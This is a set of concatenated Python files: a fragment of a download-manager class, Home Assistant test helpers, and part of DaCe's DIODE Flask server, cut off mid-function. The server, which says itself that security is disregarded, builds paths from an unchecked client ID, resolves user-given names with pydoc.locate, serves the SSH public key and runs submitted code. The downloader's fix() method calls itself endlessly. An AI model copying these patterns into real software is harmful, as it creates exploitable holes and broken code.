len(kwargs[m]) == iter_len: node[n] = kwargs[m][i] else: raise Exception('IterLenError') pack_yield.append(node) if wait is False: self.__batch_thread__ = threading.Thread(target=self.__batchAdd__, args=(pack_yield, )) self.__batch_thread__.start() else: self.__batchAdd__(pack_yield) def addNode(self, *args, **kwargs): self.url.addNode(*args, **kwargs) if self.file.size == -1: self.file.size = self.url.getFileSize() if not self.file.name: self.file.name = self.url.getFileName() if not self.file.name: self.file = File(name=self.file.name, path=self.file.path, size=self.url.getFileSize(), block_size=self.file.BLOCK_SIZE) def delete(self, url=None, urlid=None): if urlid: self.url.delete(urlid) elif url: for i in self.url.dict.values(): if i.url == url: self.url.delete(i.id) def insert(self, begin, end, Urlid=None, thread_num=1): put_urlid = self.globalprog.allotter.assignUrlid() if not Urlid else Urlid if put_urlid != -1: self.globalprog.fs.insert(begin, end) for i in self.globalprog.allotter.splitRange((begin, end), thread_num): self.globalprog.insert(put_urlid, i[0], i[1]) def manualRun(self): if not self.globalprog.progresses: raise Exception('EmptyEqueue') self.globalprog.run() def getFileName(self): return self.file.name if self.file.name else None def getFileSize(self): return self.url.getFileSize() def getUrls(self): return self.url.dict def getInsSpeed(self): return self.globalprog.getInsSpeed() def getAvgSpeed(self): return self.globalprog.getAvgSpeed() def getLeft(self): return self.globalprog.getLeft() def getOnlines(self): return self.globalprog.getOnlines() def getConnections(self): return self.globalprog.getConnections() def getBlockMap(self): return self.globalprog.getMap() def getSegsValue(self): return self.globalprog.fs.getvalue() def getSegsSize(self): return self.globalprog.fs.getStorageSize() def getUrlsThread(self): return self.globalprog.allotter.getUrlsThread() def __config_params__(self): return {'filename': 'file.name', 'filepath': 'file.path', 'block_size': 'file.BLOCK_SIZE', 'max_conn': 'url.max_conn', 'buffer_size': 'file.buffer_size', 'max_speed': 'url.max_speed', } def config(self, **kwargs): for i, j in self.__config_params__().items(): if i in kwargs: objs = j.split('.') if len(objs) == 1: setattr(self, objs[0], kwargs[i]) else: attr = getattr(self, 
objs[0]) for m in objs[1:-1]: attr = getattr(attr, m) setattr(attr, objs[-1], kwargs[i]) def close(self): if not self.globalprog.isEnd(): raise Exception('DownloadNotComplete') if os.path.isfile(os.path.join(self.file.path, self.file.name + '.nbdler')): os.remove(os.path.join(self.file.path, self.file.name + '.nbdler')) def fileVerify(self, sample_size=4096): self.install(GlobalProgress(self, MANUAL)) if sample_size > self.file.BLOCK_SIZE: raise Exception('ParamsError') for i, j in self.globalprog.progresses.items(): Range = segToRange(i) self.insert(Range[1] - sample_size, Range[1]) self.manualRun() while not self.globalprog.isEnd(): time.sleep(0.1) all_value = self.globalprog.fs.getvalue() damage = [] with open(os.path.join(self.file.path, self.file.name), 'rb') as f: for i, j in all_value.items(): Range = segToRange(i) f.seek(Range[0]) if f.read(sample_size) != j: damage.append(i) self.uninstall() return damage def fix(self, segs): self.fix(segs) def sampleUrls(self, sample_size=1024 * 1024): import random self.url.matchSize() if self.file.size < sample_size: sample_size = self.file.size _begin = random.randint(0, self.file.size - sample_size) _end = _begin + sample_size global_dict = {} for i in self.url.getUrls().keys(): glob = GlobalProgress(self, MANUAL) global_dict[i] = glob self.install(glob) self.insert(_begin, _end, i) self.manualRun() while True: for i in global_dict.values(): if not i.isEnd(): break else: break time.sleep(0.1) samples = {} for i, j in global_dict.items(): i.fs.seek(_begin) samples[i] = i.fs.read(sample_size) sample_type = [] sample_type.append([samples.keys()[0]]) for i, j in samples.items(): for m in sample_type: if i not in m: if samples[i] == samples[m[0]]: m.append(i) break else: break else: sample_type.append([i]) self.uninstall() return sample_type def run(self): if self.__new_project__: self.file.makeFile() self.globalprog.allotter.makeBaseConn() self.globalprog.save() self.globalprog.run() def pause(self): self.globalprog.pause() def isEnd(self): return self.globalprog.isEnd() def unpack(self, packet): Packer.unpack(self, packet) self.__new_project__ = False def __packet_params__(self): return ['url', 'file', '__auto_global__']
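A hypothetical usage sketch of the Handler defined above: the URL, file name and option values are invented; the method names and keyword arguments follow __config_params__ and __URL_NODE_PARAMS__, and the units printed below are assumptions.

# Hypothetical usage of Handler (values are examples, not real endpoints).
if __name__ == '__main__':
    dl = Handler()
    dl.config(filename='example.bin', filepath='.', max_conn=4)
    dl.addNode(url='http://example.com/example.bin')
    dl.run()
    while not dl.isEnd():
        # getInsSpeed()/getLeft() are assumed to report instantaneous speed and bytes remaining.
        print('speed: %s, left: %s' % (dl.getInsSpeed(), dl.getLeft()))
        time.sleep(1)
    # close() removes the .nbdler resume file once the download has finished.
    dl.close()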
common.py
"""Test the helper method for writing tests.""" import asyncio import os import sys from datetime import timedelta from unittest import mock from unittest.mock import patch from io import StringIO import logging import threading from contextlib import contextmanager from homeassistant import core as ha, loader from homeassistant.bootstrap import ( setup_component, async_prepare_setup_component) from homeassistant.helpers.entity import ToggleEntity from homeassistant.util.unit_system import METRIC_SYSTEM import homeassistant.util.dt as date_util import homeassistant.util.yaml as yaml from homeassistant.const import ( STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED, EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE, ATTR_DISCOVERED, SERVER_PORT) from homeassistant.components import sun, mqtt _TEST_INSTANCE_PORT = SERVER_PORT _LOGGER = logging.getLogger(__name__) def get_test_config_dir(*add_path): """Return a path to a test config dir.""" return os.path.join(os.path.dirname(__file__), "testing_config", *add_path) def get_test_home_assistant(): """Return a Home Assistant object pointing at test config dir.""" if sys.platform == "win32": loop = asyncio.ProactorEventLoop() else: loop = asyncio.new_event_loop() hass = loop.run_until_complete(async_test_home_assistant(loop)) # FIXME should not be a daemon. Means hass.stop() not called in teardown stop_event = threading.Event() def run_loop(): """Run event loop.""" # pylint: disable=protected-access loop._thread_ident = threading.get_ident() loop.run_forever() loop.close() stop_event.set() threading.Thread(name="LoopThread", target=run_loop, daemon=True).start() orig_start = hass.start orig_stop = hass.stop @patch.object(hass.loop, 'run_forever') @patch.object(hass.loop, 'close') def start_hass(*mocks): """Helper to start hass.""" orig_start() hass.block_till_done() def stop_hass(): """Stop hass.""" orig_stop() stop_event.wait() hass.start = start_hass hass.stop = stop_hass return hass @asyncio.coroutine def async_test_home_assistant(loop): """Return a Home Assistant object pointing at test config dir.""" loop._thread_ident = threading.get_ident() hass = ha.HomeAssistant(loop) hass.config.location_name = 'test home' hass.config.config_dir = get_test_config_dir() hass.config.latitude = 32.87336 hass.config.longitude = -117.22743 hass.config.elevation = 0 hass.config.time_zone = date_util.get_time_zone('US/Pacific') hass.config.units = METRIC_SYSTEM hass.config.skip_pip = True if 'custom_components.test' not in loader.AVAILABLE_COMPONENTS: yield from loop.run_in_executor(None, loader.prepare, hass) hass.state = ha.CoreState.running # Mock async_start orig_start = hass.async_start @asyncio.coroutine def mock_async_start(): with patch.object(loop, 'add_signal_handler'), \ patch('homeassistant.core._async_create_timer'), \ patch.object(hass, '_async_tasks_cleanup', return_value=None): yield from orig_start() hass.async_start = mock_async_start return hass def get_test_instance_port(): """Return unused port for running test instance. The socket that holds the default port does not get released when we stop HA in a different test case. Until I have figured out what is going on, let's run each test on a different port. """ global _TEST_INSTANCE_PORT _TEST_INSTANCE_PORT += 1 return _TEST_INSTANCE_PORT def mock_service(hass, domain, service): """Setup a fake service. Return a list that logs all calls to fake service. 
""" calls = [] @ha.callback def mock_service(call): calls.append(call) # pylint: disable=unnecessary-lambda hass.services.register(domain, service, mock_service) return calls def fire_mqtt_message(hass, topic, payload, qos=0): """Fire the MQTT message.""" hass.bus.fire(mqtt.EVENT_MQTT_MESSAGE_RECEIVED, { mqtt.ATTR_TOPIC: topic, mqtt.ATTR_PAYLOAD: payload, mqtt.ATTR_QOS: qos, }) def fire_time_changed(hass, time): """Fire a time changes event.""" hass.bus.fire(EVENT_TIME_CHANGED, {'now': time}) def fire_service_discovered(hass, service, info): """Fire the MQTT message.""" hass.bus.fire(EVENT_PLATFORM_DISCOVERED, { ATTR_SERVICE: service, ATTR_DISCOVERED: info }) def ensure_sun_risen(hass): """Trigger sun to rise if below horizon.""" if sun.is_on(hass): return fire_time_changed(hass, sun.next_rising_utc(hass) + timedelta(seconds=10)) def ensure_sun_set(hass): """Trigger sun to set if above horizon.""" if not sun.is_on(hass): return fire_time_changed(hass, sun.next_setting_utc(hass) + timedelta(seconds=10)) def load_fixture(filename): """Helper to load a fixture.""" path = os.path.join(os.path.dirname(__file__), 'fixtures', filename) with open(path) as fptr: return fptr.read() def mock_state_change_event(hass, new_state, old_state=None): """Mock state change envent.""" event_data = { 'entity_id': new_state.entity_id, 'new_state': new_state, } if old_state: event_data['old_state'] = old_state hass.bus.fire(EVENT_STATE_CHANGED, event_data) def mock_http_component(hass): """Mock the HTTP component.""" hass.http = mock.MagicMock() hass.config.components.append('http') hass.http.views = {} def mock_register_view(view): """Store registered view.""" if isinstance(view, type): # Instantiate the view, if needed view = view(hass) hass.http.views[view.name] = view hass.http.register_view = mock_register_view def mock_mqtt_component(hass): """Mock the MQTT component.""" with mock.patch('homeassistant.components.mqtt.MQTT') as mock_mqtt: setup_component(hass, mqtt.DOMAIN, { mqtt.DOMAIN: { mqtt.CONF_BROKER: 'mock-broker', } }) return mock_mqtt class MockModule(object): """Representation of a fake module.""" # pylint: disable=invalid-name def __init__(self, domain=None, dependencies=None, setup=None, requirements=None, config_schema=None, platform_schema=None, async_setup=None): """Initialize the mock module.""" self.DOMAIN = domain self.DEPENDENCIES = dependencies or [] self.REQUIREMENTS = requirements or [] self._setup = setup if config_schema is not None: self.CONFIG_SCHEMA = config_schema if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if async_setup is not None: self.async_setup = async_setup def setup(self, hass, config): """Setup the component. We always define this mock because MagicMock setups will be seen by the executor as a coroutine, raising an exception. 
""" if self._setup is not None: return self._setup(hass, config) return True class MockPlatform(object): """Provide a fake platform.""" # pylint: disable=invalid-name def __init__(self, setup_platform=None, dependencies=None, platform_schema=None): """Initialize the platform.""" self.DEPENDENCIES = dependencies or [] self._setup_platform = setup_platform if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema def setup_platform(self, hass, config, add_devices, discovery_info=None): """Setup the platform.""" if self._setup_platform is not None: self._setup_platform(hass, config, add_devices, discovery_info) class MockToggleDevice(ToggleEntity): """Provide a mock toggle device.""" def __init__(self, name, state): """Initialize the mock device.""" self._name = name or DEVICE_DEFAULT_NAME self._state = state self.calls = [] @property def name(self): """Return the name of the device if any.""" self.calls.append(('name', {})) return self._name @property def state(self): """Return the name of the device if any.""" self.calls.append(('state', {})) return self._state @property def is_on(self): """Return true if device is on.""" self.calls.append(('is_on', {})) return self._state == STATE_ON def turn_on(self, **kwargs): """Turn the device on.""" self.calls.append(('turn_on', kwargs)) self._state = STATE_ON def turn_off(self, **kwargs): """Turn the device off.""" self.calls.append(('turn_off', kwargs)) self._state = STATE_OFF def last_call(self, method=None): """Return the last call.""" if not self.calls: return None elif method is None: return self.calls[-1] else: try: return next(call for call in reversed(self.calls) if call[0] == method) except StopIteration: return None def patch_yaml_files(files_dict, endswith=True): """Patch load_yaml with a dictionary of yaml files.""" # match using endswith, start search with longest string matchlist = sorted(list(files_dict.keys()), key=len) if endswith else [] def mock_open_f(fname, **_): """Mock open() in the yaml module, used by load_yaml.""" # Return the mocked file on full match if fname in files_dict: _LOGGER.debug('patch_yaml_files match %s', fname) res = StringIO(files_dict[fname]) setattr(res, 'name', fname) return res # Match using endswith for ends in matchlist: if fname.endswith(ends): _LOGGER.debug('patch_yaml_files end match %s: %s', ends, fname) res = StringIO(files_dict[ends]) setattr(res, 'name', fname) return res # Fallback for hass.components (i.e. services.yaml) if 'homeassistant/components' in fname: _LOGGER.debug('patch_yaml_files using real file: %s', fname) return open(fname, encoding='utf-8') # Not found raise FileNotFoundError('File not found: {}'.format(fname)) return patch.object(yaml, 'open', mock_open_f, create=True) def mock_coro(return_value=None): """Helper method to return a coro that returns a value.""" @asyncio.coroutine def coro(): """Fake coroutine.""" return return_value return coro @contextmanager def assert_setup_component(count, domain=None): """Collect valid configuration from setup_component. - count: The amount of valid platforms that should be setup - domain: The domain to count is optional. 
      It can be automatically determined most of the time.

    Use as a context manager around bootstrap.setup_component:

        with assert_setup_component(0) as result_config:
            setup_component(hass, start_config, domain)
            # using result_config is optional
    """
    config = {}

    @asyncio.coroutine
    def mock_psc(hass, config_input, domain):
        """Mock the prepare_setup_component to capture config."""
        res = yield from async_prepare_setup_component(
            hass, config_input, domain)
        config[domain] = None if res is None else res.get(domain)
        _LOGGER.debug('Configuration for %s, Validated: %s, Original %s',
                      domain, config[domain], config_input.get(domain))
        return res

    assert isinstance(config, dict)
    with patch('homeassistant.bootstrap.async_prepare_setup_component',
               mock_psc):
        yield config

    if domain is None:
        assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
                                  .format(list(config.keys())))
        domain = list(config.keys())[0]

    res = config.get(domain)
    res_len = 0 if res is None else len(res)
    assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
        .format(count, res_len, res)
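A small usage sketch may make the helpers above more concrete. The function below is illustrative only (its name is made up); it relies solely on MockToggleDevice and the STATE_ON/STATE_OFF constants already imported by this helpers module.

# Hedged usage sketch (illustration only): exercising MockToggleDevice and
# last_call(). Uses only names defined or imported earlier in this module.
def example_mock_toggle_device():
    device = MockToggleDevice('ceiling', STATE_ON)
    assert device.is_on

    device.turn_off()
    assert device.state == STATE_OFF
    assert device.last_call('turn_off') == ('turn_off', {})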
diode_server.py
#!flask/bin/python # Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved. import aenum import dace import dace.serialize import dace.frontend.octave.parse as octave_frontend from dace.codegen import codegen from diode.DaceState import DaceState from dace.transformation.optimizer import SDFGOptimizer from dace.transformation.transformation import PatternTransformation from dace.sdfg.nodes import LibraryNode import inspect from flask import Flask, Response, request, redirect, url_for, abort, jsonify, send_from_directory, send_file import json import copy import multiprocessing import re from diode.remote_execution import AsyncExecutor import traceback import os import pydoc import threading import queue import time app = Flask(__name__) # Prepare a whitelist of DaCe enumeration types enum_list = [ typename for typename, dtype in inspect.getmembers(dace.dtypes, inspect.isclass) if issubclass(dtype, aenum.Enum) ] es_ref = [] remote_execution = False config_lock = threading.Lock() RUNNING_TIMEOUT = 3 class ConfigCopy: """ Copied Config for passing by-value """ def __init__(self, config_values): self._config = config_values def get(self, *key_hierarchy): current_conf = self._config for key in key_hierarchy: current_conf = current_conf[key] return current_conf def get_bool(self, *key_hierarchy): from dace.config import _env2bool res = self.get(*key_hierarchy) if isinstance(res, bool): return res return _env2bool(str(res)) def set(self, *key_hierarchy, value=None, autosave=False): raise Exception("ConfigCopy does not allow setting values!") def save(self, path=None): """ Nonstatic version of Config::save() """ if path is None: path = Config._cfg_filename # Write configuration file with open(path, 'w') as f: import yaml yaml.dump(self._config, f, default_flow_style=False) class ExecutorServer: """ Implements a server scheduling execution of dace programs """ def __init__(self): self._command_queue = queue.Queue() # Fast command queue. Must be polled often (< 30 ms response time) self._executor_queue = queue.Queue() # Run command queue. 
Latency not critical _self = self def helper(): _self.loop() def ehelper(): _self.executorLoop() self._task_dict = {} self._run_num = 0 self._running = True self._thread = threading.Thread(target=helper, daemon=True) self._thread.start() self._executor_thread = threading.Thread(target=ehelper, daemon=True) self._executor_thread.start() self._current_runs = {} self._orphaned_runs = {} self._oplock = threading.Lock() self._run_cv = threading.Condition() # Used to trickle run tasks through (as the tasks are run in a thread) self._slot_available = True # True if the target machine has a slot for running a program self._perfdata_available = {} # Dict mapping client_id => .can-path self._ticket_counter = 0 self._command_results = {} # Dict mapping ticket => command result def executorLoop(self): while self._running: self.consume_programs() def loop(self): while self._running: self.consume() def waitForCommand(self, ticket): while True: try: with self._oplock: ret = self._command_results[ticket] del self._command_results[ticket] except: time.sleep(2) continue return ret def addCommand(self, cmd): with self._oplock: cmd['ticket'] = self._ticket_counter self._ticket_counter += 1 self._command_queue.put(cmd) print("Added command to queue") return cmd['ticket'] def consume_programs(self): try: cmd = self._executor_queue.get(timeout=3) if cmd['cmd'] == "run": while True: with self._run_cv: if self._slot_available: break import time time.sleep(0.5) with self._run_cv: self._slot_available = False print("Running task") self._task_dict[cmd['index']]['state'] = 'running' runner = self.run( cmd['cot'], { 'index': cmd['index'], 'config_path': cmd['config_path'], 'client_id': cmd['cid'], 'reset-perfdata': cmd['reset-perfdata'], 'perfopts': cmd['opt']['perfopts'] }) print("Wait for oplock") with self._oplock: self._current_runs[cmd['cid']] = runner import time # Wait a predefined time for clients to catch up on the outputs time.sleep(RUNNING_TIMEOUT) with self._oplock: run_locally = True try: x = self._current_runs[cmd['cid']] except: run_locally = False if run_locally: print("running locally") def tmp(): with self._oplock: del self._current_runs[cmd['cid']] try: c = self._orphaned_runs[cmd['cid']] except: self._orphaned_runs[cmd['cid']] = [] self._orphaned_runs[cmd['cid']].append([]) print("Starting runner") for x in runner(): self._orphaned_runs[cmd['cid']][-1] += x # Because this holds locks (and the output should be generated even if nobody asks for it immediately), this is run when the timeout for direct interception expires tmp() elif cmd['cmd'] == 'control': # Control operations that must be synchronous with execution (e.g. 
for cleanup, storage operations) with self._oplock: self._task_dict[cmd['index']]['state'] = 'running' if cmd['operation'] == 'startgroup': pass elif cmd['operation'] == 'remove_group': pass elif cmd['operation'] == 'endgroup': pass with self._oplock: del self._task_dict[cmd['index']] except queue.Empty: return def consume(self): try: cmd = self._command_queue.get(timeout=3) if isinstance(cmd, str): pass else: command = cmd['cmd'] print("Got command " + command) except queue.Empty: return def getExecutionOutput(self, client_id): import time ret = None err_count = 0 while ret is None: with self._oplock: try: ret = self._current_runs[client_id] del self._current_runs[client_id] except: err_count += 1 if err_count < 20: # Give 20 seconds of space for compilation and distribution time.sleep(1) continue def egen(): yield "ERROR: Failed to get run reference" return egen return ret def stop(self): self._running = False def lock(self): self._oplock.acquire() def unlock(self): self._oplock.release() @staticmethod def getPerfdataDir(client_id): if not os.path.isdir("perfdata-dir/"): os.mkdir("perfdata-dir") tpath = "perfdata-dir/" + client_id try: os.mkdir(tpath) except: pass perf_tmp_dir = tpath return perf_tmp_dir def addRun(self, client_id, compilation_output_tuple, more_options): config_path = "./client_configs/" + client_id + ".conf" if not os.path.isdir("./client_configs/"): os.mkdir("./client_configs/") if not os.path.isfile(config_path): # Config not (yet) available, load default and copy with config_lock: from dace.config import Config Config.load() Config.save(config_path) if isinstance(compilation_output_tuple, str): # Group command gc = compilation_output_tuple val = { 'cid': client_id, 'cmd': 'control', 'index': self._run_num, 'operation': None, 'config_path': config_path, 'state': "pending" } if gc == "start": val['operation'] = 'startgroup' elif gc == "end": val['operation'] = 'endgroup' else: def g(): yield '{ "error": "Unknown group operation" }' return g with self._oplock: self._executor_queue.put(val) self._task_dict[self._run_num] = val self._run_num += 1 return with self._oplock: val = { 'index': self._run_num, 'type': 'run', 'cid': client_id, 'config_path': config_path, 'cmd': 'run', 'cot': compilation_output_tuple, 'opt': more_options, 'state': 'pending', 'reset-perfdata': False } self._executor_queue.put(val) self._task_dict[self._run_num] = val self._run_num += 1 def error_gen(): yield '{ "error": "Run was scheduled. Please poll until ready or longpoll." 
}' return error_gen def run(self, cot, options): print("=> Run called") print("Options: " + str(options)) compilation_output_tuple = cot runindex = options['index'] config_path = options['config_path'] sdfgs, code_tuples, dace_state = compilation_output_tuple # Passes output through HTTP1.1 streaming (using yield) def runner(): print("Trying to get lock") with self._run_cv: yield "Run starting\n" with config_lock: from dace.config import Config Config.load(config_path) # Copy the config - this allows releasing the config lock # without suffering from potential side effects copied_config = ConfigCopy(Config._config) self._slot_available = False dace_state.set_is_compiled(False) terminal_queue = multiprocessing.Queue() async_executor = AsyncExecutor(remote=remote_execution) async_executor.autoquit = True async_executor.executor.output_queue = terminal_queue async_executor.executor.set_config(copied_config) async_executor.run_async(dace_state) async_executor.to_proc_message_queue.put("forcequit") while async_executor.running_proc.is_alive(): try: new = terminal_queue.get(timeout=1) yield new except: # Check if the sub-process is still running continue # Flush remaining outputs while not terminal_queue.empty(): new = terminal_queue.get(timeout=1) yield new with self._oplock: # Delete from the tasklist del self._task_dict[runindex] # Output instrumentation report, if exists if (async_executor.running_proc.exitcode == 0 and dace_state.sdfg.is_instrumented()): report = dace_state.sdfg.get_latest_report() yield '\nInstrumentation report:\n%s\n\n' % report yield ('Run finished with exit code %d' % async_executor.running_proc.exitcode) self._slot_available = True return runner @app.route('/') def redirect_base(): return redirect(url_for("index", path="index.html"), code=301) @app.route('/webclient/<path:path>', methods=['GET']) def index(path): """ This is an http server (on the same port as the REST API). It serves the files from the 'webclient'-directory to user agents. Note: This is NOT intended for production environments and security is disregarded! """ return send_from_directory(os.path.join(os.path.dirname(os.path.abspath(__file__)), "webclient"), path) @app.route('/dace/api/v1.0/getPubSSH/', methods=['GET']) def getPubSSH(): try: with open(os.path.expanduser("~/.ssh/id_rsa.pub")) as f: key = f.read() return jsonify({"pubkey": key}) except: print("Failed to open keyfile") traceback.print_exc() return jsonify({"pubkey": "0"}) @app.route('/dace/api/v1.0/getEnum/<string:name>', methods=['GET']) def getEnum(name): """ Helper function to enumerate available values for `ScheduleType`. Returns: enum: List of string-representations of the values in the enum """ valid_params = enum_list if name not in valid_params: # To protect against arbitrary code execution, this request is refused print("Enum type '" + str(name) + "' is not in Whitelist") abort(400) return jsonify({'enum': [str(e).split(".")[-1] for e in getattr(dace.dtypes, name)]}) @app.route('/dace/api/v1.0/getLibImpl/<string:name>', methods=['GET']) def get_library_implementations(name): """ Helper function to enumerate available implementations for a given library node. Returns: enum: List of string-representations of implementations """ cls = pydoc.locate(name) if cls is None: return jsonify([]) return jsonify(list(cls.implementations.keys())) @app.route('/dace/api/v1.0/expand/', methods=['POST']) def expand_node_or_sdfg(): """ Performs expansion of a single library node or an entire SDFG. 
Fields: sdfg (required): SDFG as JSON nodeid (not required): A list of: [SDFG ID, state ID, node ID] """ try: sdfg = dace.SDFG.from_json(request.json['sdfg']) except KeyError: return jsonify({'error': 'SDFG not given'}) try: sdfg_id, state_id, node_id = request.json['nodeid'] except KeyError: sdfg_id, state_id, node_id = None, None, None if sdfg_id is None: sdfg.expand_library_nodes() else: context_sdfg = sdfg.sdfg_list[sdfg_id] state = context_sdfg.node(state_id) node = state.node(node_id) if isinstance(node, LibraryNode): node.expand(context_sdfg, state) else: return jsonify({'error': 'The given node is not a library node'}) return jsonify({'sdfg': sdfg.to_json()}) def collect_all_SDFG_nodes(sdfg): ret = [] for sid, state in enumerate(sdfg.nodes()): for nid, node in enumerate(state.nodes()): ret.append(('s' + str(sid) + '_' + str(nid), node)) return ret def split_nodeid_in_state_and_nodeid(nodeid): match = re.match(r"s(\d+)_(\d+)", nodeid) if match: ids = match.groups() return int(ids[0]), int(ids[1]) else: match = re.match(r"dummy_(\d+)", nodeid) if match: ids = match.groups() return int(ids[0]), None else: raise ValueError("Node ID " + nodeid + " has the wrong form") return None def properties_to_json_list(props): ret = [] for x, val in props: try: typestr = x.dtype.__name__ except: # Try again, it might be an enum try: typestr = x.enum.__name__ except: typestr = 'None' # Special case of CodeProperty if isinstance(x, dace.properties.CodeProperty): typestr = "CodeProperty" if val is None: continue val = x.to_string(val) # Special case of DebugInfoProperty: Transcribe to object (this is read-only) if isinstance(x, dace.properties.DebugInfoProperty): typestr = "DebugInfo" if val is None: continue nval = { "filename": val.filename, "start_line": val.start_line, "end_line": val.end_line, "start_col": val.start_column, "end_col": val.end_column } val = json.dumps(nval) ret.append({ "name": str(x.attr_name), "desc": str(x.desc), "type": typestr, "default": str(x.default), "value": str(val) }) return ret def applySDFGProperty(sdfg, property_element, step=None): try: prop_step = int(property_element['step']) except: print("[Warning] Prop step was not provided") prop_step = 0 print("applySDFGProperty: step " + str(step) + ", prop_step: " + str(prop_step)) if step is not None and prop_step != step: # Step mismatch; ignore return sdfg sid = int(property_element['state_id']) nid = int(property_element['node_id']) node = sdfg.node(sid).node(nid) for prop in property_element['params']: dace.serialize.set_properties_from_json(node, prop, context=sdfg) return sdfg def applySDFGProperties(sdfg, properties, step=None): for x in properties: applySDFGProperty(sdfg, x, step) return sdfg def applyOptPath(sdfg, optpath, useGlobalSuffix=True, sdfg_props=None): # Iterate over the path, applying the transformations global_counter = {} sdfg_props = sdfg_props or [] step = 0 for x in optpath: optimizer = SDFGOptimizer(sdfg, inplace=True) name = x['name'] classname = name[:name.index('$')] if name.find('$') >= 0 else name transformation = next(t for t in PatternTransformation.subclasses_recursive() if t.__name__ == classname) matching = optimizer.get_pattern_matches(patterns=[transformation]) # Apply properties (will automatically apply by step-matching) sdfg = applySDFGProperties(sdfg, sdfg_props, step) for pattern in matching: name = type(pattern).__name__ tsdfg = sdfg.sdfg_list[pattern.sdfg_id] if useGlobalSuffix: if name in global_counter: global_counter[name] += 1 else: global_counter[name] = 0 tmp = 
global_counter[name] if tmp > 0: name += "$" + str(tmp) if name == x['name']: #for prop in x['params']['props']: #if prop['name'] == 'subgraph': continue #set_properties_from_json(pattern, prop, sdfg) dace.serialize.set_properties_from_json(pattern, x['params']['props'], context=sdfg) pattern.apply_pattern(tsdfg) if not useGlobalSuffix: break step += 1 sdfg = applySDFGProperties(sdfg, sdfg_props, step) return sdfg def create_DaceState(code, sdfg_dict, errors): dace_state = None try: dace_state = DaceState(code, "fake.py", remote=remote_execution) for x in dace_state.sdfgs: name, sdfg = x sdfg_dict[name] = sdfg return dace_state except SyntaxError as se: # Syntax error errors.append({'type': "SyntaxError", 'line': se.lineno, 'offset': se.offset, 'text': se.text, 'msg': se.msg}) except ValueError as ve: # DACE-Specific error tb = traceback.format_exc() errors.append({'type': "ValueError", 'stringified': str(ve), 'traceback': tb}) except Exception as ge: # Generic exception tb = traceback.format_exc() errors.append({'type': ge.__class__.__name__, 'stringified': str(ge), 'traceback': tb}) return dace_state def compileProgram(request, language, perfopts=None): if not request.json or (('code' not in request.json) and ('sdfg' not in request.json)): print("[Error] No input code provided, cannot continue") abort(400) errors = [] try: optpath = request.json['optpath'] except: optpath = None try: sdfg_props = request.json['sdfg_props'] except: sdfg_props = None if perfopts is None: try: perf_mode = request.json['perf_mode'] except: perf_mode = None else: #print("Perfopts: " + str(perfopts)) perf_mode = perfopts client_id = request.json['client_id'] sdfg_dict = {} sdfg_eval_order = [] with config_lock: # Lock the config - the config may be modified while holding this lock, but the config MUST be restored. 
from dace.config import Config config_path = "./client_configs/" + client_id + ".conf" if os.path.isfile(config_path): Config.load(config_path) else: Config.load() dace_state = None in_sdfg = None if "sdfg" in request.json: in_sdfg = request.json['sdfg'] if isinstance(in_sdfg, list): if len(in_sdfg) > 1: # TODO: Allow multiple sdfg inputs raise NotImplementedError("More than 1 SDFG provided") in_sdfg = in_sdfg[0] if isinstance(in_sdfg, str): in_sdfg = json.loads(in_sdfg) if isinstance(in_sdfg, dict): # Generate callbacks (needed for elements referencing others) def loader_callback(name: str): # Check if already available and if yes, return it if name in sdfg_dict: return sdfg_dict[name] # Else: This function has to recreate the given sdfg sdfg_dict[name] = dace.SDFG.from_json(in_sdfg[name], {'sdfg': None, 'callback': loader_callback}) sdfg_eval_order.append(name) return sdfg_dict[name] for k, v in in_sdfg.items(): # Leave it be if the sdfg was already created # (this might happen with SDFG references) if k in sdfg_dict: continue if isinstance(v, str): v = json.loads(v) sdfg_dict[k] = dace.SDFG.from_json(v, {'sdfg': None, 'callback': loader_callback}) sdfg_eval_order.append(k) else: in_sdfg = dace.SDFG.from_json(in_sdfg) sdfg_dict[in_sdfg.name] = in_sdfg else: print("Using code to compile") code = request.json['code'] if (isinstance(code, list)): if len(code) > 1: print("More than 1 code file provided!") abort(400) code = code[0] if language == "octave": statements = octave_frontend.parse(code, debug=False) statements.provide_parents() statements.specialize() sdfg = statements.generate_code() sdfg.set_sourcecode(code, "matlab") elif language == "dace": dace_state = create_DaceState(code, sdfg_dict, errors) # The DaceState uses the variable names in the dace code. 
This is not useful enough for us, so we translate copied_dict = {} for k, v in sdfg_dict.items(): copied_dict[v.name] = v sdfg_dict = copied_dict if len(errors) == 0: if optpath is not None: for sdfg_name, op in optpath.items(): try: sp = sdfg_props[sdfg_name] except: # In any error case, just ignore the properties sp = None print("Applying opts for " + sdfg_name) print("Dict: " + str(sdfg_dict.keys())) sdfg_dict[sdfg_name] = applyOptPath(sdfg_dict[sdfg_name], op, sdfg_props=sp) code_tuple_dict = {} # Deep-copy the SDFG (codegen may change the SDFG it operates on) codegen_sdfgs = copy.deepcopy(sdfg_dict) codegen_sdfgs_dace_state = copy.deepcopy(sdfg_dict) if len(errors) == 0: if sdfg_eval_order: sdfg_eval = [(n, codegen_sdfgs[n]) for n in reversed(sdfg_eval_order)] else: sdfg_eval = codegen_sdfgs.items() for n, s in sdfg_eval: try: if Config.get_bool('diode', 'general', 'library_autoexpand'): s.expand_library_nodes() code_tuple_dict[n] = codegen.generate_code(s) except dace.sdfg.NodeNotExpandedError as ex: code_tuple_dict[n] = [str(ex)] except Exception: # Forward exception to output code code_tuple_dict[n] = ['Code generation failed:\n' + traceback.format_exc()] if dace_state is None: if "code" in request.json: in_code = request.json['code'] else: in_code = "" dace_state = DaceState(in_code, "tmp.py", remote=remote_execution) dace_state.set_sdfg(list(codegen_sdfgs_dace_state.values())[0], list(codegen_sdfgs_dace_state.keys())[0]) if len(dace_state.errors) > 0: print("ERRORS: " + str(dace_state.errors)) errors.extend(dace_state.errors) # The config won't save back on its own, and we don't want it to - these changes are transient if len(errors) > 0: return errors # Only return top-level SDFG return ({k: v for k, v in sdfg_dict.items() if v.parent is None}, code_tuple_dict, dace_state) #return sdfg_dict, code_tuple_dict, dace_state def get_transformations(sdfgs): opt_per_sdfg = {} for sdfg_name, sdfg in sdfgs.items(): opt = SDFGOptimizer(sdfg) ptrns = opt.get_pattern_matches() optimizations = [] for p in 